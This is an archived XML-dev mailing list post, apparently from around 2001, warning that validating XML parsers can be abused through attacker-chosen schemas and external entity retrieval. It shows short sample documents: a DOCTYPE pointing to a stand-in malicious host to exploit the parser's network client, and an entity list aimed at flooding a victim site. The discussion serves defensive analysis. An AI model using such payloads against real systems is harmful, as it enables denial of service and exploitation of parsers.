OASIS Mailing List ArchivesView the OASIS mailing list archive below
or browse/search using MarkMail.


Help: OASIS Mailing Lists Help | MarkMail Help



   Malicious documents? (WAS: Interesting mailing list & a rare broadside)

[ Lists Home | Date Index | Thread Index ]

James Clark wrote,
> Suppose an application is trying to use validation to protect itself
> from bad input. It carefully loads the schema cache with the
> namespaces it knows about, and calls validate().  Now the bad guy
> comes along and uses a root element from some other namespace and
> uses xsi:schemaLocation to point to his own schema that that has a
> declaration for that element and uses <xs:any namespace="##any"
> processContents="skip"/>.  Won't they just have almost completely
> undermined any protection that was supposed to come from validation?

This is at least partly related to something that's been worrying me on 
and off for quite a while now. It seems like a fairly obvious worry, 
but I don't recall seeing any explicit discussion of it here (or 
anywhere else for that matter).

Many (most?) off the shelf XML parsers, at least when validating, will 
by default attempt to retrieve external subsets and other entities via 
their system ids. This implies that an arbitrary XML document instance, 
whether from a trusted or untrusted source, can cause an XML processor 
to make network connections to any host on any port using any protocol  
for which retrieval is supported by the network client associated with 
the XML processor.

This opens up at least two, possibly more, kinds of attack,

* Exploiting vulnerabilities in network clients.

  A malicious host might submit the following kind of document instance
  to an XML processor,

    <?xml version="1.0"?>
    <!DOCTYPE foo SYSTEM "http://www.malicious-host.com/evil-uri";>

  The server at www.malicious-host.com could return a response
  carefully crafted to exploit weaknesses in the victim XML processors
  network client.

* Using XML processors for denial of service attacks.

  Consider the following document instance,

    <?xml version="1.0"?>
    <!DOCTYPE foo [
      <!ENTITY hit-1 SYSTEM "http://www.victim.org/victim-uri1>
      <!ENTITY hit-2 SYSTEM "http://www.victim.org/victim-uri2>

      <!-- repeat ad nauseam ... -->      

      <!ENTITY hit-n-1 SYSTEM "http://www.victim.org/victim-uri-n-1>
      <!ENTITY hit-n SYSTEM "http://www.victim.org/victim-uri-n>

      <!-- repeat ad nauseam ... -->      

  When presented with such a document an unwitting XML processor might
  proceed to clobber www.victim.org.

If anyone can come up with variations on this theme I'd be extremely 
interested to hear about them.

There are, I think, a couple of conclusions to draw from the examples 
above. First, that validating untrusted documents, rather than 
protecting receiving applications, might actually be quite a dangerous 
activity. Second, that in some contexts XML document instances might be 
better thought of as being closer to active content than to text/plain
thanks to the implicit retrieval semantics of references to external 

Neither of these conclusions are particularly surprising, and in some 
respects they've been discussed here before under the heading of XML
application robustness. For example, a related case would be the runtime 
configuration file,

  <?xml version="1.0"?>
  <!DOCTYPE foo SYSTEM "http://www.unwise.com/config.dtd";>

for an application which insists on validating its configuration on 
startup, but doesn't maintain a locally cached copy of the DTD: after 
the 10000th sale the server at www.unwise.com collapses under the 
strain of 10,000 requests for config.dtd at 9am in the morning leading 
to all installations of the application failing. There's also a privacy 
issue here: the DTD retrieval could be construed as the application 
"phoning home".





News | XML in Industry | Calendar | XML Registry
Marketplace | Resources | MyXML.org | Sponsors | Privacy Statement

Copyright 2001 XML.org. This site is hosted by OASIS